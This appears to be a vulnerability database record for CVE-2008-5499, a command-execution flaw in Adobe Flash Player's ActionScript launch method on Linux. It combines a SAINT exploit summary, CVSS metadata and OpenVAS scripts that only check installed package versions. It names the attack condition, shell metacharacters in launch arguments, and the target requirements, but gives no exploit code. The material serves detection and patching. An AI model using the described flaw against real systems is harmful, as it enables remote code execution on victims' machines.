Background
Adobe Flash Player is a cross-platform browser plug-in providing visual enhancements for web pages.
Problem
An input validation vulnerability allows command execution when the browser loads an SWF file which contains shell metacharacters in the arguments to the ActionScript launch method.
Resolution
Upgrade to Adobe Flash Player 10.0.15.3 or higher.
Limitations
The exploit works on Adobe Systems Flash Player 10.0.12.36 on Red Hat Enterprise Linux 5 and requires a user to load the exploit page in a browser.
The target host must have the Adobe AIR package installed.
The target host must have Perl installed.
Platforms
Linux
{"type": "saint", "edition": 2, "title": "Adobe Flash Player ActionScript launch command execution", "references": [], "published": "2008-01-07T00:00:00", "lastseen": "2019-05-29T17:19:55", "modified": "2008-01-07T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/flash_actionscript_launch", "viewCount": 5, "reporter": "SAINT Corporation", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5499"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231063554", "OPENVAS:63554", "OPENVAS:800087", "OPENVAS:850022", "OPENVAS:1361412562310800087"]}, {"type": "exploitdb", "idList": ["EDB-ID:18761"]}, {"type": "seebug", "idList": ["SSV:60075", "SSV:4580", "SSV:72802"]}, {"type": "suse", "idList": ["SUSE-SA:2008:059"]}, {"type": "saint", "idList": ["SAINT:82B8544AAE7DA47AB2B24B12A3DAC0AD", "SAINT:CB4CD425A2F03D26817AFADE0D8C3615"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/BROWSER/ADOBE_FLASHPLAYER_ASLAUNCH"]}, {"type": "nessus", "idList": ["SUSE_FLASH-PLAYER-5878.NASL", "GENTOO_GLSA-200903-23.NASL", "SUSE_11_0_FLASH-PLAYER-081218.NASL", "SUSE_FLASH-PLAYER-5877.NASL", "REDHAT-RHSA-2008-1047.NASL", "SUSE_11_1_FLASH-PLAYER-081218.NASL"]}, {"type": "redhat", "idList": ["RHSA-2008:1047"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112009"]}, {"type": "gentoo", "idList": ["GLSA-200903-23"]}], "modified": "2019-05-29T17:19:55", "rev": 2}, "score": {"value": 8.5, "vector": "NONE", "modified": "2019-05-29T17:19:55", "rev": 2}, "vulnersScore": 8.5}, "cvelist": ["CVE-2008-5499"], "description": "Added: 01/07/2008 \nCVE: [CVE-2008-5499](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5499>) \nBID: [32896](<http://www.securityfocus.com/bid/32896>) \nOSVDB: [50796](<http://www.osvdb.org/50796>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual 
enhancements for web pages. \n\n### Problem\n\nAn input validation vulnerability allows command execution when the browser loads an SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.0.15.3 or higher. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb08-24.html> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.0.12.36 on Red Hat Enterprise Linux 5 and requires a user to load the exploit page in a browser. \n\nThe target host must have the Adobe AIR package installed. \n\nThe target host must have PERL installed. \n\n### Platforms\n\nLinux \n \n\n", "id": "SAINT:9E8C91C24922ECE29A3639F1B10A4936", "bulletinFamily": "exploit", "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:28:27", "description": "Unspecified vulnerability in Adobe Flash Player for Linux 10.0.12.36, and 9.0.151.0 and earlier, allows remote attackers to execute arbitrary code via a crafted SWF file.", "edition": 5, "cvss3": {}, "published": "2008-12-18T00:30:00", "title": "CVE-2008-5499", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5499"], "modified": "2017-08-08T01:33:00", "cpe": ["cpe:/a:adobe:flash_player_for_linux:9.0.48.0", "cpe:/a:adobe:flash_player_for_linux:10.0.12.36", "cpe:/a:adobe:flash_player_for_linux:9.0.115.0", "cpe:/a:adobe:flash_player_for_linux:9.0.151.0", "cpe:/a:adobe:flash_player_for_linux:9.0.31", "cpe:/a:adobe:flash_player_for_linux:9.0.124.0"], "id": "CVE-2008-5499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5499", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player_for_linux:9.0.115.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player_for_linux:9.0.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player_for_linux:9.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player_for_linux:9.0.151.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player_for_linux:9.0.124.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player_for_linux:10.0.12.36:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-12T11:19:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "description": "Check for the Version of flash-player", "modified": "2017-12-08T00:00:00", 
"published": "2009-01-23T00:00:00", "id": "OPENVAS:850022", "href": "http://plugins.openvas.org/nasl.php?oid=850022", "type": "openvas", "title": "SuSE Update for flash-player SUSE-SA:2008:059", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2008_059.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for flash-player SUSE-SA:2008:059\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"remote code execution\";\ntag_affected = \"flash-player on openSUSE 10.3, openSUSE 11.0, openSUSE 11.1, Novell Linux Desktop 9, SUSE Linux Enterprise Desktop 10 SP2\";\ntag_insight = \"The Adobe Flash Player was updated to fix an unspecified vulnerability\n that allowed attackers to take control of the victim's system by\n having the victim load a specially crafted SWF file, for instance\n embedded in a web page CVE-2008-5499.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850022);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", 
value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-23 16:44:26 +0100 (Fri, 23 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2008-059\");\n script_cve_id(\"CVE-2008-5499\");\n script_name( \"SuSE Update for flash-player SUSE-SA:2008:059\");\n\n script_summary(\"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"SLESDk10SP2\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~9.0.152.0~0.3\", rls:\"SLESDk10SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE10.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~9.0.152.0~0.1\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~9.0.152.0~0.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.0.15.3~1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-20T08:50:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "description": "This host has Adobe Flash Player installed and is prone to\n Shockwave Flash (SWF) Processing vulnerabilities.", "modified": "2017-07-05T00:00:00", "published": "2008-12-19T00:00:00", "id": "OPENVAS:800087", "href": "http://plugins.openvas.org/nasl.php?oid=800087", "type": "openvas", "title": "Adobe Flash Player for Linux SWF Processing Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_swf_proc_vuln.nasl 6539 2017-07-05 12:02:14Z cfischer $\n#\n# Adobe Flash Player for Linux SWF Processing Vulnerability\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attack could result in execution of arbitrary code on the remote\n affected system.\n Impact Level: System\";\ntag_affected = \"Adobe Flash Player prior to 9.0.152.0/10.0.15.3 on Linux.\";\ntag_insight = \"The issue is due to the way Flash Player handles the SWF files.\";\ntag_solution = \"Upgrade to Adobe Flash Player 9.0.152.0 or 10.0.15.3,\n http://www.adobe.com/downloads\";\ntag_summary = \"This host has Adobe Flash Player installed and is prone to\n Shockwave Flash (SWF) Processing vulnerabilities.\";\n\nif(description)\n{\n script_id(800087);\n script_version(\"$Revision: 6539 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 14:02:14 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-19 13:40:09 +0100 (Fri, 19 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5499\");\n script_name(\"Adobe Flash Player for Linux SWF Processing Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb08-24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : 
\"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nadobeVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(!adobeVer){\n exit(0);\n}\n# Version match 9.0 to 9.0.151.0 and 10.0 to 10.0.12.36\nif(version_in_range(version:adobeVer, test_version:\"9.0\",\n test_version2:\"9.0.151.0\")){\n security_message(0);\n}\nelse if(version_in_range(version:adobeVer, test_version:\"10.0\",\n test_version2:\"10.0.12.36\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "description": "This host has Adobe Flash Player installed and is prone to\n Shockwave Flash (SWF) Processing vulnerabilities.", "modified": "2020-04-27T00:00:00", "published": "2008-12-19T00:00:00", "id": "OPENVAS:1361412562310800087", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800087", "type": "openvas", "title": "Adobe Flash Player for Linux SWF Processing Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player for Linux SWF Processing Vulnerability\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800087\");\n script_version(\"2020-04-27T11:04:25+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 11:04:25 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2008-12-19 13:40:09 +0100 (Fri, 19 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5499\");\n script_name(\"Adobe Flash Player for Linux SWF Processing Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb08-24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful attack could result in execution of arbitrary code on the remote\n affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player prior to 9.0.152.0/10.0.15.3 on Linux.\");\n\n script_tag(name:\"insight\", value:\"The issue is due to the way Flash Player handles the SWF files.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player 9.0.152.0 or 10.0.15.3.\");\n\n script_tag(name:\"summary\", value:\"This host has Adobe Flash Player installed and is prone to\n Shockwave Flash (SWF) Processing 
vulnerabilities.\");\n\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nadobeVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(!adobeVer){\n exit(0);\n}\n# Version match 9.0 to 9.0.151.0 and 10.0 to 10.0.12.36\nif(version_in_range(version:adobeVer, test_version:\"9.0\",\n test_version2:\"9.0.151.0\")){\n report = report_fixed_ver(installed_version:adobeVer, vulnerable_range:\"9.0 - 9.0.151.0\");\n security_message(port: 0, data: report);\n}\nelse if(version_in_range(version:adobeVer, test_version:\"10.0\",\n test_version2:\"10.0.12.36\")){\n report = report_fixed_ver(installed_version:adobeVer, vulnerable_range:\"10.0 - 10.0.12.36\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:38:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5362", "CVE-2009-0114", "CVE-2008-5361", "CVE-2009-0520", "CVE-2008-4824", "CVE-2008-5499", "CVE-2008-3873", "CVE-2008-5363", "CVE-2008-4823", "CVE-2008-4822", "CVE-2008-4818", "CVE-2008-4819", "CVE-2009-0519", "CVE-2008-4401", "CVE-2008-4503", "CVE-2009-0521", "CVE-2008-4821"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-23.", "modified": "2018-04-06T00:00:00", "published": "2009-03-13T00:00:00", "id": "OPENVAS:136141256231063554", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063554", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-23 (netscape-flash)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been identified, the worst of which allow\narbitrary code execution on a user's system via a malicious Flash file.\";\ntag_solution = \"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-www/netscape-flash-10.0.22.87'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-23\nhttp://bugs.gentoo.org/show_bug.cgi?id=239543\nhttp://bugs.gentoo.org/show_bug.cgi?id=251496\nhttp://bugs.gentoo.org/show_bug.cgi?id=260264\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-23.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63554\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-3873\", \"CVE-2008-4401\", \"CVE-2008-4503\", \"CVE-2008-4818\", \"CVE-2008-4819\", 
\"CVE-2008-4821\", \"CVE-2008-4822\", \"CVE-2008-4823\", \"CVE-2008-4824\", \"CVE-2008-5361\", \"CVE-2008-5362\", \"CVE-2008-5363\", \"CVE-2008-5499\", \"CVE-2009-0114\", \"CVE-2009-0519\", \"CVE-2009-0520\", \"CVE-2009-0521\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-23 (netscape-flash)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/netscape-flash\", unaffected: make_list(\"ge 10.0.22.87\"), vulnerable: make_list(\"lt 10.0.22.87\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5362", "CVE-2009-0114", "CVE-2008-5361", "CVE-2009-0520", "CVE-2008-4824", "CVE-2008-5499", "CVE-2008-3873", "CVE-2008-5363", "CVE-2008-4823", "CVE-2008-4822", "CVE-2008-4818", "CVE-2008-4819", "CVE-2009-0519", "CVE-2008-4401", "CVE-2008-4503", "CVE-2009-0521", "CVE-2008-4821"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-23.", "modified": 
"2017-07-07T00:00:00", "published": "2009-03-13T00:00:00", "id": "OPENVAS:63554", "href": "http://plugins.openvas.org/nasl.php?oid=63554", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-23 (netscape-flash)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been identified, the worst of which allow\narbitrary code execution on a user's system via a malicious Flash file.\";\ntag_solution = \"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-www/netscape-flash-10.0.22.87'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-23\nhttp://bugs.gentoo.org/show_bug.cgi?id=239543\nhttp://bugs.gentoo.org/show_bug.cgi?id=251496\nhttp://bugs.gentoo.org/show_bug.cgi?id=260264\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-23.\";\n\n \n \n\nif(description)\n{\n script_id(63554);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-3873\", \"CVE-2008-4401\", \"CVE-2008-4503\", \"CVE-2008-4818\", \"CVE-2008-4819\", \"CVE-2008-4821\", \"CVE-2008-4822\", \"CVE-2008-4823\", \"CVE-2008-4824\", \"CVE-2008-5361\", \"CVE-2008-5362\", \"CVE-2008-5363\", \"CVE-2008-5499\", \"CVE-2009-0114\", \"CVE-2009-0519\", \"CVE-2009-0520\", \"CVE-2009-0521\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-23 (netscape-flash)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/netscape-flash\", unaffected: make_list(\"ge 10.0.22.87\"), vulnerable: make_list(\"lt 10.0.22.87\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "description": "Added: 01/07/2008 \nCVE: [CVE-2008-5499](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5499>) \nBID: [32896](<http://www.securityfocus.com/bid/32896>) \nOSVDB: [50796](<http://www.osvdb.org/50796>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nAn input validation vulnerability allows command execution when the browser loads an SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.0.15.3 or higher. 
\n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb08-24.html> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.0.12.36 on Red Hat Enterprise Linux 5 and requires a user to load the exploit page in a browser. \n\nThe target host must have the Adobe AIR package installed. \n\nThe target host must have PERL installed. \n\n### Platforms\n\nLinux \n \n\n", "edition": 4, "modified": "2008-01-07T00:00:00", "published": "2008-01-07T00:00:00", "id": "SAINT:82B8544AAE7DA47AB2B24B12A3DAC0AD", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/flash_actionscript_launch", "title": "Adobe Flash Player ActionScript launch command execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "description": "Added: 01/07/2008 \nCVE: [CVE-2008-5499](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5499>) \nBID: [32896](<http://www.securityfocus.com/bid/32896>) \nOSVDB: [50796](<http://www.osvdb.org/50796>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nAn input validation vulnerability allows command execution when the browser loads an SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.0.15.3 or higher. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb08-24.html> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.0.12.36 on Red Hat Enterprise Linux 5 and requires a user to load the exploit page in a browser. \n\nThe target host must have the Adobe AIR package installed. \n\nThe target host must have PERL installed. 
